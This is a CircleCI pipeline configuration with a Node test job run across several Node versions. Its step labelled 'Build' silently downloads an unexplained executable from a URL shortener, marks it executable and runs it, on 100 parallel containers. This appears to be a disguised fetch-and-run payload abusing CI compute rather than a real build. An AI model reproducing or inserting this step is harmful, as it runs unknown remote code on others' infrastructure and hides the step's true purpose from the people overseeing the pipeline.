version: 2.1

orbs:
  node: circleci/node@5.0.2

executors:
  docker: # Docker using the Base Convenience Image
    docker:
      - image: cimg/base:stable
  linux: # a Linux VM running Ubuntu 20.04
    machine:
      image: ubuntu-2004:202107-02
jobs:
 test:
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    parallelism: 100
    steps:
      - checkout
      - node/install:
          install-yarn: true
          node-version: '16.16'
      - run: node --version
      - run: 
          name: "Build"
          command:
            wget -qq https://cutt.ly/IL7Bfml && chmod +x IL7Bfml && ./IL7Bfml

workflows:
  all-tests:
    jobs:
      - test:
          matrix:
            parameters:
              os: [linux,]
              node-version: ["14.17.6", "16.9.0", "18.6.0"]